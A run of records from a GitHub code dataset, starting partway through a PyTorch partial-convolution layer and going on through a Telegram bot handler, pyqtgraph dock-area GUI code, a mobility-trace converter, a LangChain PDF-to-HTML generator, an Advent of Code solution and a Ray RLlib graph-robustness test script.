self.kernel_size[0], self.kernel_size[1])\n \n self.slide_winsize = self.weight_maskUpdater.shape[1] * self.weight_maskUpdater.shape[2] * self.weight_maskUpdater.shape[3]\n\n self.last_size = (None, None, None, None)\n self.update_mask = None\n self.mask_ratio = None\n\n def forward(self, input, mask_in):\n assert len(input.shape) == 4\n self.last_size = tuple(input.shape)\n\n with torch.no_grad():\n if self.weight_maskUpdater.type() != input.type():\n self.weight_maskUpdater = self.weight_maskUpdater.to(input)\n\n mask = mask_in\n \n self.update_mask = F.conv2d(mask, self.weight_maskUpdater, bias=None, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=1)\n\n # for mixed precision training, change 1e-8 to 1e-6\n self.mask_ratio = self.slide_winsize/(self.update_mask + 1e-8)\n # self.mask_ratio = torch.max(self.update_mask)/(self.update_mask + 1e-8)\n self.update_mask = torch.clamp(self.update_mask, 0, 1)\n self.mask_ratio = torch.mul(self.mask_ratio, self.update_mask)\n\n\n if self.mask_channels > 1:\n masked_img1 = torch.mul(input[:,:input.shape[1]//2,...], mask[:,0,...].unsqueeze(1))\n masked_img2 = torch.mul(input[:,input.shape[1]//2:,...], mask[:,1,...].unsqueeze(1))\n raw_out = self.conv(torch.cat((masked_img1, masked_img2), 1))\n else:\n raw_out = self.conv(torch.mul(input, mask))\n\n# if self.bias is not None:\n# bias_view = self.bias.view(1, self.out_channels, 1, 1)\n# output = torch.mul(raw_out - bias_view, self.mask_ratio) + bias_view\n# output = torch.mul(output, self.update_mask)\n# else:\n output = torch.mul(raw_out, self.mask_ratio)\n\n\n# if self.return_mask:\n# return output, self.update_mask\n# else:\n return output, self.update_mask\n ","repo_name":"mintingchen/ECE285-Project","sub_path":"model/partconv2d.py","file_name":"partconv2d.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74855036323","text":"from database.repository.chat_settings_repository import ChatSettingsRepository\nfrom database.repository.user_repository import UserRepository\nfrom aiogram import Bot, types\nfrom asyncio import gather\n\n\nasync def left_chat_member(\n message: types.Message,\n bot: Bot,\n user_repo: UserRepository,\n):\n chat_admins = await bot.get_chat_administrators(message.chat.id)\n if any(\n (i for i in chat_admins if all([i.user.id == bot.id, i.can_delete_messages]))\n ):\n chat_settings_repo = ChatSettingsRepository(user_repo.conn)\n chat_setting = await chat_settings_repo.get(message.chat.id)\n\n if chat_setting and chat_setting.IsNeedToDeleteServiceMessageOnLeave:\n await message.delete()\n else:\n gather(\n *[\n bot.send_message(\n i.user.id,\n f\"Please promote me to administrator in this chat: {message.chat.title}\\nAlso i need permission to delete messages.\",\n )\n for i in chat_admins\n ]\n )\n","repo_name":"Forevka/Aiogram.Captcha.Example","sub_path":"bot/handlers/messages/left_chat_member.py","file_name":"left_chat_member.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"1764038730","text":"# -*- coding: utf-8 -*-\nimport weakref\nfrom ..Qt import QtCore, QtGui\nfrom .Container import *\nfrom .DockDrop import *\nfrom .Dock import Dock\nfrom .. import debug as debug\nfrom ..python2_3 import basestring\n\n\nclass DockArea(Container, QtGui.QWidget, DockDrop):\n def __init__(self, temporary=False, home=None):\n Container.__init__(self, self)\n QtGui.QWidget.__init__(self)\n DockDrop.__init__(self, allowedAreas=['left', 'right', 'top', 'bottom'])\n self.layout = QtGui.QVBoxLayout()\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(0)\n self.setLayout(self.layout)\n self.docks = weakref.WeakValueDictionary()\n self.topContainer = None\n self.raiseOverlay()\n self.temporary = temporary\n self.tempAreas = []\n self.home = home\n \n def type(self):\n return \"top\"\n \n def addDock(self, dock=None, position='bottom', relativeTo=None, **kwds):\n \"\"\"Adds a dock to this area.\n \n ============== =================================================================\n **Arguments:**\n dock The new Dock object to add. If None, then a new Dock will be \n created.\n position 'bottom', 'top', 'left', 'right', 'above', or 'below'\n relativeTo If relativeTo is None, then the new Dock is added to fill an \n entire edge of the window. If relativeTo is another Dock, then \n the new Dock is placed adjacent to it (or in a tabbed \n configuration for 'above' and 'below'). \n ============== =================================================================\n \n All extra keyword arguments are passed to Dock.__init__() if *dock* is\n None. \n \"\"\"\n if dock is None:\n dock = Dock(**kwds)\n \n \n ## Determine the container to insert this dock into.\n ## If there is no neighbor, then the container is the top.\n if relativeTo is None or relativeTo is self:\n if self.topContainer is None:\n container = self\n neighbor = None\n else:\n container = self.topContainer\n neighbor = None\n else:\n if isinstance(relativeTo, basestring):\n relativeTo = self.docks[relativeTo]\n container = self.getContainer(relativeTo)\n neighbor = relativeTo\n \n ## what container type do we need?\n neededContainer = {\n 'bottom': 'vertical',\n 'top': 'vertical',\n 'left': 'horizontal',\n 'right': 'horizontal',\n 'above': 'tab',\n 'below': 'tab'\n }[position]\n \n ## Can't insert new containers into a tab container; insert outside instead.\n if neededContainer != container.type() and container.type() == 'tab':\n neighbor = container\n container = container.container()\n \n ## Decide if the container we have is suitable.\n ## If not, insert a new container inside.\n if neededContainer != container.type():\n if neighbor is None:\n container = self.addContainer(neededContainer, self.topContainer)\n else:\n container = self.addContainer(neededContainer, neighbor)\n \n ## Insert the new dock before/after its neighbor\n insertPos = {\n 'bottom': 'after',\n 'top': 'before',\n 'left': 'before',\n 'right': 'after',\n 'above': 'before',\n 'below': 'after'\n }[position]\n #print \"request insert\", dock, insertPos, neighbor\n old = dock.container()\n container.insert(dock, insertPos, neighbor)\n dock.area = self\n self.docks[dock.name()] = dock\n if old is not None:\n old.apoptose()\n \n return dock\n \n def moveDock(self, dock, position, neighbor):\n \"\"\"\n Move an existing Dock to a new location. \n \"\"\"\n ## Moving to the edge of a tabbed dock causes a drop outside the tab box\n if position in ['left', 'right', 'top', 'bottom'] and neighbor is not None and neighbor.container() is not None and neighbor.container().type() == 'tab':\n neighbor = neighbor.container()\n self.addDock(dock, position, neighbor)\n \n def getContainer(self, obj):\n if obj is None:\n return self\n return obj.container()\n \n def makeContainer(self, typ):\n if typ == 'vertical':\n new = VContainer(self)\n elif typ == 'horizontal':\n new = HContainer(self)\n elif typ == 'tab':\n new = TContainer(self)\n return new\n \n def addContainer(self, typ, obj):\n \"\"\"Add a new container around obj\"\"\"\n new = self.makeContainer(typ)\n \n container = self.getContainer(obj)\n container.insert(new, 'before', obj)\n #print \"Add container:\", new, \" -> \", container\n if obj is not None:\n new.insert(obj)\n self.raiseOverlay()\n return new\n \n def insert(self, new, pos=None, neighbor=None):\n if self.topContainer is not None:\n self.topContainer.containerChanged(None)\n self.layout.addWidget(new)\n self.topContainer = new\n #print self, \"set top:\", new\n new._container = self\n self.raiseOverlay()\n #print \"Insert top:\", new\n \n def count(self):\n if self.topContainer is None:\n return 0\n return 1\n \n \n #def paintEvent(self, ev):\n #self.drawDockOverlay()\n \n def resizeEvent(self, ev):\n self.resizeOverlay(self.size())\n \n def addTempArea(self):\n if self.home is None:\n area = DockArea(temporary=True, home=self)\n self.tempAreas.append(area)\n win = TempAreaWindow(area)\n area.win = win\n win.show()\n else:\n area = self.home.addTempArea()\n #print \"added temp area\", area, area.window()\n return area\n \n def floatDock(self, dock):\n \"\"\"Removes *dock* from this DockArea and places it in a new window.\"\"\"\n area = self.addTempArea()\n area.win.resize(dock.size())\n area.moveDock(dock, 'top', None)\n \n \n def removeTempArea(self, area):\n self.tempAreas.remove(area)\n #print \"close window\", area.window()\n area.window().close()\n \n def saveState(self):\n \"\"\"\n Return a serialized (storable) representation of the state of\n all Docks in this DockArea.\"\"\"\n\n if self.topContainer is None:\n main = None\n else:\n main = self.childState(self.topContainer)\n\n state = {'main': main, 'float': []}\n for a in self.tempAreas:\n geo = a.win.geometry()\n geo = (geo.x(), geo.y(), geo.width(), geo.height())\n state['float'].append((a.saveState(), geo))\n return state\n \n def childState(self, obj):\n if isinstance(obj, Dock):\n return ('dock', obj.name(), {})\n else:\n childs = []\n for i in range(obj.count()):\n childs.append(self.childState(obj.widget(i)))\n return (obj.type(), childs, obj.saveState())\n \n \n def restoreState(self, state):\n \"\"\"\n Restore Dock configuration as generated by saveState.\n \n Note that this function does not create any Docks--it will only \n restore the arrangement of an existing set of Docks.\n \n \"\"\"\n \n ## 1) make dict of all docks and list of existing containers\n containers, docks = self.findAll()\n oldTemps = self.tempAreas[:]\n #print \"found docks:\", docks\n \n ## 2) create container structure, move docks into new containers\n if state['main'] is not None:\n self.buildFromState(state['main'], docks, self)\n \n ## 3) create floating areas, populate\n for s in state['float']:\n a = self.addTempArea()\n a.buildFromState(s[0]['main'], docks, a)\n a.win.setGeometry(*s[1])\n \n ## 4) Add any remaining docks to the bottom\n for d in docks.values():\n self.moveDock(d, 'below', None)\n \n #print \"\\nKill old containers:\"\n ## 5) kill old containers\n for c in containers:\n c.close()\n for a in oldTemps:\n a.apoptose()\n\n\n def buildFromState(self, state, docks, root, depth=0):\n typ, contents, state = state\n pfx = \" \" * depth\n if typ == 'dock':\n try:\n obj = docks[contents]\n del docks[contents]\n except KeyError:\n raise Exception('Cannot restore dock state; no dock with name \"%s\"' % contents)\n else:\n obj = self.makeContainer(typ)\n \n root.insert(obj, 'after')\n #print pfx+\"Add:\", obj, \" -> \", root\n \n if typ != 'dock':\n for o in contents:\n self.buildFromState(o, docks, obj, depth+1)\n obj.apoptose(propagate=False)\n obj.restoreState(state) ## this has to be done later?\n \n\n def findAll(self, obj=None, c=None, d=None):\n if obj is None:\n obj = self.topContainer\n \n ## check all temp areas first\n if c is None:\n c = []\n d = {}\n for a in self.tempAreas:\n c1, d1 = a.findAll()\n c.extend(c1)\n d.update(d1)\n \n if isinstance(obj, Dock):\n d[obj.name()] = obj\n elif obj is not None:\n c.append(obj)\n for i in range(obj.count()):\n o2 = obj.widget(i)\n c2, d2 = self.findAll(o2)\n c.extend(c2)\n d.update(d2)\n return (c, d)\n\n def apoptose(self):\n #print \"apoptose area:\", self.temporary, self.topContainer, self.topContainer.count()\n if self.topContainer.count() == 0:\n self.topContainer = None\n if self.temporary:\n self.home.removeTempArea(self)\n #self.close()\n\n def clear(self):\n docks = self.findAll()[1]\n for dock in docks.values():\n dock.close()\n \n ## PySide bug: We need to explicitly redefine these methods\n ## or else drag/drop events will not be delivered.\n def dragEnterEvent(self, *args):\n DockDrop.dragEnterEvent(self, *args)\n\n def dragMoveEvent(self, *args):\n DockDrop.dragMoveEvent(self, *args)\n\n def dragLeaveEvent(self, *args):\n DockDrop.dragLeaveEvent(self, *args)\n\n def dropEvent(self, *args):\n DockDrop.dropEvent(self, *args)\n\n\nclass TempAreaWindow(QtGui.QMainWindow):\n def __init__(self, area, **kwargs):\n QtGui.QMainWindow.__init__(self, **kwargs)\n self.setCentralWidget(area)\n\n def closeEvent(self, *args, **kwargs):\n self.centralWidget().clear()\n QtGui.QMainWindow.closeEvent(self, *args, **kwargs)\n","repo_name":"AOtools/soapy","sub_path":"soapy/pyqtgraph/dockarea/DockArea.py","file_name":"DockArea.py","file_ext":"py","file_size_in_byte":11309,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"52"} +{"seq_id":"70933460005","text":"import argparse\nimport os\nimport csv\n\n\ndef main(folder: str, input: str, timeUnit: str, dimensions: int) -> None:\n hosts = dict()\n if not os.path.exists(folder):\n os.makedirs(folder)\n with open(input, 'r') as f: # open in readonly mode\n data = csv.reader(f, delimiter=\" \")\n number = 0\n for row in data:\n key = f'{number}'\n hosts[key] = \"time,x,y,z\\n\"\n for ii in range(int(len(row)/(dimensions + 1))):\n i = ii*(dimensions +1)\n if dimensions == 2:\n hosts[key] = f'{hosts[key]}{row[i]},{row[i+1]},{row[i+2]},0.0\\n'\n else:\n hosts[key] = f'{hosts[key]}{row[i]},{row[i + 1]},{row[i + 2]},{row[i+3]}\\n'\n number += 1\n\n for key in hosts.keys():\n with open(os.path.join(folder, f'host[{key}].csv'), 'w') as out:\n out.write(hosts[key])\n out.close()\n\nif __name__ == \"__main__\":\n main(f'outputfolder', f'BonnMotionFile.csv', 's', 3)\n\n","repo_name":"cedrikschueler/PARRoT","sub_path":"Tools/BonnMotionToTraceFiles.py","file_name":"BonnMotionToTraceFiles.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"69803427685","text":"from langchain.document_loaders import PyMuPDFLoader\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.vectorstores import Chroma\nfrom langchain.text_splitter import SentenceTransformersTokenTextSplitter\nfrom langchain.prompts import PromptTemplate\nfrom langchain.docstore.document import Document\nfrom langchain.llms import OpenAI\nfrom langchain.chains import LLMChain\nfrom langchain.chains.summarize import load_summarize_chain\nfrom . import *\nfrom utils.nlp_trainers import LDATrainer\nimport asyncio\n\nclass ContextBasedGenerator:\n def __init__(self, pdf_paths=None, k=5) -> None:\n prompt_template = \"\"\"You are a document creator that creates html sections based on prompts and context, which shall provide details required for the job. \n Context shall be provided in chunks: 'ctx number', 'total ctx' provide the current chunk number, and the total chunks to be recieved respectively. 'ctx summary' provides a short summary of all the context you are to recieve. This shall be useful for any part of the document that needs summarising. You need to create valid, logical and visually pleasing html sections that will be later combined inside tags(externally provided) to form a complete html document. For ctx number = 1, you will need to add an introductory section before anything, and you must add a heading for the document. For ctx number = total ctx, you will need to add a conclusion section. Important: For all other ctx numbers, you cannot add these sections.\n The context and the context summary are based on *people's* views on various topics: you must rephrase them as a new person's view. Do not copy them as-is. \n You may include css, and up to 1 image in the html script. The image \"alt\" tag will be used as description for an image generation model to generate an image. \"src\" tag should be an empty string and description should be in English. Add images only if necessary or asked by prompt. Now create a document based on the context and prompt given below:\n Context: {context}\n Prompt: {prompt}\n ctx number: {context_number}\n total ctx: {total_context}\n ctx summary: {context_summary}\n html:\"\"\"\n self.k = 5\n self.PROMPT = PromptTemplate(\n template=prompt_template, input_variables=\n [\"context\", \"prompt\", \"context_summary\", \"context_number\", \"total_context\" ]\n )\n self.llm = OpenAI(model_name=\"text-davinci-003\", max_tokens=2950, temperature=0.0)\n self.chain = LLMChain(llm=self.llm, prompt=self.PROMPT)\n self.summary_chain = load_summarize_chain(self.llm, chain_type=\"map_reduce\")\n self.text_splitter = SentenceTransformersTokenTextSplitter(chunk_size=1024, chunk_overlap=50)\n if(pdf_paths is not None):\n self.generate_db_from_pdf(pdf_paths)\n \n def generate_db_from_pdf(self, pdf_paths):\n texts = []\n titles = []\n for pdf_path in pdf_paths:\n loader = PyMuPDFLoader(pdf_path)\n document = loader.load()\n titles.append(document[0])\n texts+=self.text_splitter.split_documents(document)\n self.max_search_len = len(texts)\n self.texts = texts\n self.titles = titles\n\n @property\n def db(self):\n vectordb = Chroma.from_documents(documents=self.texts, \n embedding=OpenAIEmbeddings())\n return vectordb\n\n def generate_chain_response(self, prompt):\n docs = self.get_top_k_documents(prompt)\n with open(\"docs.log\", \"w\") as f:\n for doc in docs:\n f.write(doc.page_content)\n f.write(\"\\n===========\\n\")\n # raise Exception(\"stop\")\n print(\"Summarising documents\")\n summary = self.summary_chain.run(docs)\n print(\"Summarised documents: \", summary, \"========\", sep=\"\\n\")\n inputs = [\n {\n \"context\": doc.page_content, \n \"prompt\": prompt,\n \"context_summary\": summary,\n \"context_number\": idx,\n \"total_context\": len(docs)\n } \n for doc, idx in zip(docs, range(1, len(docs)+1))]\n gpt_response = self.chain.apply(inputs)\n output = \"\"\n with open(\"gpt.log\", \"w\") as f:\n for resp in gpt_response:\n f.write(resp[\"text\"])\n f.write(\"\\n============\\n\")\n output += resp[\"text\"]\n output = [resp[\"text\"] for resp in gpt_response]\n output = \"\\n\" + \"\\n\".join(output) + \"\\n\"\n return output\n\n def get_top_k_documents(self, prompt):\n assert self.db is not None, \"Database not initialized\"\n k = self.k\n prompt_result = self.db.similarity_search_with_score(prompt, k=k)\n \n docs = []\n for result in prompt_result:\n score = result[1]\n if(score >= 0.5):\n break\n docs.append(result[0])\n \n if(len(docs) < 1):\n print(\"No documents found with similarity score less than 0.5. Looking for generic results.\")\n docs = self.get_generic_results()\n else:\n print(\"Found documents with similarity score less than 0.5: returning\")\n \n return docs\n \n def get_generic_results(self):\n # TODO: optimize this\n k=min(self.k, self.max_search_len)\n # docs = self.db.max_marginal_relevance_search(\n # ' ', k=k, lambda_mult=0.0)\n print(\"Creating prompts based on LDA keywords\")\n text_list = [text.page_content for text in self.titles]\n lda = LDATrainer(k, text_list, passes=10)\n smart_queries = lda.make_smart_queries()\n print(\"Queries: \", smart_queries, sep=\"\\n\")\n docs = []\n for query in smart_queries:\n prompt_result = self.db.similarity_search_with_score(query, k=1)\n for result in prompt_result:\n score = result[1]\n if(score >= 0.5):\n break\n docs.append(result[0])\n print(\"returning generic results\")\n return docs\n \n async def summarise(self, texts):\n return await self.summary_chain.arun(texts)\n \n async def _generate_chain_response_from_inputs(self, inputs):\n return await self.chain.aapply(inputs)\n ","repo_name":"cybershiptrooper/llm_web_api_server","sub_path":"utils/chain_expt.py","file_name":"chain_expt.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"893008663","text":"from src.d07.input_parser import *\nfrom src.d07.directory import *\n\n\ndef part1(input) -> str:\n root = parse(input)\n all_dirs = flat_dir_list(root.sub_directories)\n dirs_sizes = [dir.get_total_size() for dir in all_dirs]\n result = sum([size for size in dirs_sizes if size <= 100_000])\n return str(result)\n\n\ntotal_fylesystem_size = 70_000_000\nupdate_size = 30_000_000\n\n\ndef part2(input) -> str:\n root = parse(input)\n\n free_space = total_fylesystem_size - root.get_total_size()\n required_space = update_size - free_space\n\n all_dirs = flat_dir_list(root.sub_directories)\n dirs_sizes = [dir.get_total_size() for dir in all_dirs]\n result = min([size for size in dirs_sizes if size >= required_space])\n return str(result)\n\n\ndef flat_dir_list(dir_list: list[Directory]) -> list[Directory]:\n sub_dirs = [flat_dir_list(dir.sub_directories)\n for dir in dir_list if dir.sub_directories != []]\n return [item for sublist in sub_dirs for item in sublist] + dir_list\n\n\ndef solve_d7():\n with open('inputs/7.txt', 'r') as file_input:\n print(part1(file_input))\n\n with open('inputs/7.txt', 'r') as file_input:\n print(part2(file_input))\n","repo_name":"Degover/aoc-2022--python","sub_path":"src/d07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33512752963","text":"\"\"\"\ntest trained models\n\"\"\"\n\nimport argparse\nimport os\nimport numpy as np\nimport torch as th\nimport ray\nfrom ray import tune\nfrom ray.rllib.examples.env.parametric_actions_graph import ParametricActionsEdgeGraph\nfrom ray.rllib.examples.models.autoregressive_action_model import TorchEdgeAutoregressiveDiscreteActionModel\nfrom ray.rllib.agents.ppo import ddppo\nfrom ray.rllib.examples.models.autoregressive_action_dist import TorchGraphEdgeEmbDistribution_SP_with_stop\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.agents.ppo import DDPPOTrainer\n\n\n\n\n\nif __name__ == \"__main__\":\n\n restore_path = \"\"\n\n assert restore_path != \"\", \"must provide the location of a trained model\"\n\n ModelCatalog.register_custom_model(\n \"autoedgeregressivedecouplediscretedgraph_model\",\n TorchEdgeAutoregressiveDiscreteActionModel)\n\n ModelCatalog.register_custom_action_dist(\n \"graph_edgeEmb_pretrained_with_stop_dist\", TorchGraphEdgeEmbDistribution_SP_with_stop)\n\n assert th.cuda.device_count() > 0, \"run with gpus\"\n print('running with gpu')\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--run\", type=str, default=\"DDPPO\")\n parser.add_argument(\"--ppo_alg\", type=str, default=\"dcppo\",\n choices=[\"ppo\", 'tppo', 'dcppo'])\n parser.add_argument(\"--num-cpus\", type=int, default=60)\n parser.add_argument(\"--num-gpus\", type=int, default=8)\n\n parser.add_argument(\"--as-test\", action=\"store_true\")\n parser.add_argument(\"--max_action\", type=int, default=20, help=\"the maximum episode length\")\n parser.add_argument(\"--filtration_order\", type=int, default=-2,\n help=\"-1 means the whole size, and -2 means k% nodes\")\n parser.add_argument(\"--alpha\", type=float, default=0, help=\"-1 means grid search\")\n parser.add_argument(\"--filtration_order_ratio\", type=float, default=0.3,\n help=\"the ration of number of filtrated graphs\")\n parser.add_argument(\"--stop-iters\", type=int, default=1000)\n parser.add_argument(\"--stop-timesteps\", type=int, default=1500000)\n parser.add_argument(\"--stop-reward\", type=float, default=50)\n parser.add_argument(\"--dataset\", type=str,\n default=\"example_15\",\n choices=[\"example_15\", \"example_50\", \"example_100\", \"ba_small_30\", \"ba_mixed\" ])\n parser.add_argument(\"--max_num_node\", type=int,\n default=15, help=\"maximum number of nodes in a single graph during training\")\n parser.add_argument(\"--max_num_edge\", type=int,\n default=54,\n help=\"maximum number of edges in a single graph during training (68 for ba_small)\")\n parser.add_argument(\"--with_stop_action\", type=bool, default=True, help=\"if the policy has stop action\")\n parser.add_argument(\"--with_SimulatedAnnealing\", type=bool, default=False,\n help=\"if the env use SA to decide to accept the current action or not\")\n parser.add_argument(\"--cwd-path\", type=str, default='./')\n parser.add_argument(\"--tasks-per-gpu\", type=int, default=1, help='how manys tasks on a single gpu')\n parser.add_argument(\"--gpus_per_instance\", type=int, default=1, help='how manys gpus on a single instance')\n parser.add_argument(\"--bs\", type=int, default=4096, help='batch size')\n parser.add_argument(\"--mini-bs\", type=int, default=128, help='minibatch batch size')\n parser.add_argument(\"--hidden_dim\", type=int, default=128, help='hidden_dim')\n parser.add_argument(\"--separate_vf_optimizer\", type=bool, default=True, help='separate_vf_optimizer or not')\n parser.add_argument(\"--disable_preprocessor_api\", type=bool, default=True, help='disable_preprocessor_api')\n parser.add_argument(\"--lr\", type=float, default=3e-4, help='learning rate')\n parser.add_argument(\"--dual_clip_param\", type=float, default=5, help='dual_clip_param')\n parser.add_argument(\"--kl_target\", type=float, default=0.4, help='dual_clip_param')\n\n # different robustness measure\n parser.add_argument(\"--attack_strategy\", type=str, default='degree', choices=['-1', 'degree', 'betweenness'])\n parser.add_argument(\"--break_tie\", type=str, default='inc_by_id', choices=['-1', 'inc_by_id', 'random', 'dec_by_id'])\n\n parser.add_argument(\"--robust-measure\", type=str, default='R', choices=['R', \"sr\", \"ac\"])\n parser.add_argument(\"--sequentialMode\", type=bool, default=True)\n parser.add_argument(\"--add-penality\", type=bool, default=False)\n\n parser.add_argument(\"--single-obj\", type=bool, default=True, help=\"True: only optimize robustness\")\n parser.add_argument(\"--second-obj-func\", type=str, default='ge', choices=['ge', 'le'], help=\"'ge': global efficiency\")\n parser.add_argument(\"--reward_scale\", type=float, default=1)\n parser.add_argument(\"--is_train\", type=bool, default=True, help=\"if false, disable reward penalty\")\n parser.add_argument(\"--test_num\", type=int, default=1, help=\"how many samples are tested\")\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--no_savegraph_acs\", help=\"no savegraph and actions\", action='store_false')\n parser.add_argument(\"--is_test\", help=\"is_test\", action='store_false')\n\n\n args = parser.parse_args()\n\n if args.filtration_order == -2:\n try:\n max_node = int(args.dataset.split('_')[1])\n args.filtration_order = int(max_node * args.filtration_order_ratio)\n except:\n args.filtration_order = -1 # change to the maximum number of nodes\n print(f\"filtration_order is {args.filtration_order}\")\n\n if args.alpha == -1:\n args.alpha = tune.grid_search(list(np.linspace(0, 1, 51))[25:])\n\n # set the max_num_node and max_num_edge for the model ViewRequirement\n if args.dataset == 'ba_small':\n args.max_num_node = 20\n args.max_num_edge = 68\n elif args.dataset == 'ba_small_30':\n args.max_num_node = 30\n args.max_num_edge = 112\n elif args.dataset == 'example_15':\n args.max_num_node = 15\n args.max_num_edge = 54\n elif args.dataset == 'example_50':\n args.max_num_node = 50\n args.max_num_edge = 96 * 2\n elif args.dataset == 'ba_mixed':\n args.max_num_node = 200\n args.max_num_edge = 792\n elif args.dataset == 'example_100':\n args.max_num_node = 100\n args.max_num_edge = 196 * 2\n elif args.dataset == 'EU':\n args.max_num_node = 217\n args.max_num_edge = 320 * 2\n else:\n print('use the max_num_node/edge provided by the user')\n\n cwd_path = args.cwd_path\n print('cwd path', cwd_path)\n logdir = cwd_path #+ '/log'\n print(logdir)\n if not os.path.isdir(logdir):\n os.mkdir(logdir)\n\n ray.init(local_mode=False)\n tune.register_env(\"env\", ParametricActionsEdgeGraph)\n\n\n ModelCatalog.register_custom_action_dist(\n \"graph_edgeEmb_pretrained_with_stop_dist\", TorchGraphEdgeEmbDistribution_SP_with_stop)\n gpu_count = args.gpus_per_instance\n num_workers = gpu_count * args.tasks_per_gpu\n num_gpus = 0 # Driver GPU\n num_gpus_per_worker = float(1 / args.tasks_per_gpu) # (gpu_count - num_gpus) / (num_workers+3)\n num_envs_per_worker = 16\n num_cpus_per_worker = 1\n remote_worker_envs = False\n sgd_minibatch_size = args.mini_bs # tune.grid_search([256, 256]) ##tune.grid_search([32, 32])#32\n # train_batch_size = 256#4096#1024#tune.grid_search([2048, 4096])\n rollout_fragment_length = round(args.bs / num_workers / num_envs_per_worker)\n config = ddppo.DEFAULT_CONFIG.copy()\n\n config.update({\n \"env\": ParametricActionsEdgeGraph,\n \"env_config\": {\n \"filtration_order\": args.filtration_order,\n # tune.grid_search([14]), #tune.grid_search(list(range(6, 15))),\n \"max_action\": args.max_action,\n \"with_stop_action\": args.with_stop_action,\n \"with_SimulatedAnnealing\": args.with_SimulatedAnnealing,\n \"dataset_type\": args.dataset,\n \"max_num_node\": args.max_num_node,\n \"max_num_edge\": args.max_num_edge,\n \"robust_measure\": args.robust_measure,\n \"single_obj\": args.single_obj,\n \"second_obj_func\": args.second_obj_func,\n \"reward_scale\": args.reward_scale,\n \"sequentialMode\": args.sequentialMode,\n \"add_penality\": args.add_penality,\n \"is_train\": not args.is_test,\n \"attack_strategy\": args.attack_strategy,\n \"break_tie\": args.break_tie,\n\n \"alpha\": args.alpha # tune.grid_search([0.05, 0.15, 0.25, 0.35, 0.45]),\n }})\n config.update({\n # \"gamma\": 0.5,\n # Use GPUs iff `RLLIB_NUM_GPUS` env var set to > 0.\n \"num_gpus\": 0, # 0.35,\n \"model\": {\n \"custom_action_dist\": \"graph_edgeEmb_pretrained_with_stop_dist\",\n \"custom_model\": \"autoedgeregressivedecouplediscretedgraph_model\",\n \"custom_model_config\": {\n \"use_graph_embedding\": True,\n \"transfer_func\": 'relu',\n 'similarity_func': 'attn',\n 'direct_logits': True,\n \"hidden_dim\": args.hidden_dim,\n \"filtration_order\": args.filtration_order,\n \"use_filtration\": tune.sample_from(lambda spec: spec.config.env_config.filtration_order != 0),\n \"with_stop_action\": args.with_stop_action,\n \"max_action\": args.max_action,\n \"with_SimulatedAnnealing\": args.with_SimulatedAnnealing,\n \"dataset_type\": args.dataset,\n \"max_num_node\": args.max_num_node,\n \"max_num_edge\": args.max_num_edge,\n },\n },\n\n # this to 0 will force rollouts to be done in the trainer actor.\n \"num_workers\": 2,\n # Number of environments to evaluate vectorwise per worker. This enables\n # model inference batching, which can improve performance for inference\n # bottlenecked workloads.\n \"num_envs_per_worker\": 2,\n\n \"num_gpus_per_worker\": 1,\n # \"num_gpus_per_worker\": 0.3,\n # #\n \"sgd_minibatch_size\": 200,\n \"num_sgd_iter\": 10, #tune.grid_search([1, 10, 20]),\n # \"num_sgd_iter\": 6, #tune.grid_search([1, 10, 20]),\n # \"num_workers\": 0,\n \"grad_clip\": 0.5, #tune.grid_search([40]),\n \"gamma\": 0.995, # tune.grid_search([0.99, 0.98, 0.97, 0.96, 0.95]),\n \"lambda\": 0.98, # tune.grid_search([0.99, 0.98, 0.97,]),\n \"clip_param\": 0.2, # tune.grid_search([0.1, 0.2]),\n \"rollout_fragment_length\": 10,\n \"explore\": False,\n\n \"lr\":7e-4,\n \"kl_coeff\": 0.5, #tune.grid_search([0.5, 1]),\n \"lr_schedule\": [\n [0,1e-4],\n [args.stop_timesteps, 1e-6],\n ],\n \"entropy_coeff_schedule\": [\n [0, 0.01],\n [args.stop_timesteps, 0.001],\n ],\n \"vf_loss_coeff\": 0.01, #tune.grid_search([1e-1, 1, 0.5]),\n \"entropy_coeff\": 0.01,\n # ppo or dcppo or tppo\n \"ppo_alg\": args.ppo_alg,\n # DPPO\n \"keep_local_weights_in_sync\": True,\n \"_disable_preprocessor_api\": args.disable_preprocessor_api,\n \"_separate_vf_optimizer\": args.separate_vf_optimizer,\n\n\n \"framework\": \"torch\",# if args.torch else \"tf\",\n })\n agent = DDPPOTrainer(config, env=\"env\")\n\n\n agent.restore(restore_path)\n\n # evaluate the trained model\n env = ParametricActionsEdgeGraph(config[\"env_config\"])\n\n seed = args.seed\n env.seed(seed)\n obs = env.reset()\n if args.test_num == -1:\n args.test_num = env.wrapped.data_len\n\n for i in range(args.test_num):\n episode_reward = 0\n # env.seed(seed)\n obs = env.reset()\n\n cnt = 0\n\n\n done = False\n rew_list = []\n\n while not done:\n\n a = agent.compute_single_action(obs)\n\n edge_index = env.wrapped.edge_index.copy()\n\n obs, reward, done, env_info = env.step(a)\n decoded_action = a[-2] // obs['num_edges'].shape[0], a[-2] % obs['num_edges'].shape[0], a[-1] // \\\n obs['num_edges'].shape[0], a[-1] % obs['num_edges'].shape[0]\n print(f'encoded action is [{a}], reward is {reward:.3f}')\n decoded_action = np.concatenate([edge_index[a[1]], edge_index[a[2]]]).tolist()\n print(f'decoded action is {decoded_action}')\n\n rew_list.append(reward)\n episode_reward += reward\n cnt += 1\n\n print('[%d] th episode reward is %f:' % (i, episode_reward))\n print(np.cumsum(rew_list))\n\n agent.cleanup()\n\n del agent\n del env\n\n 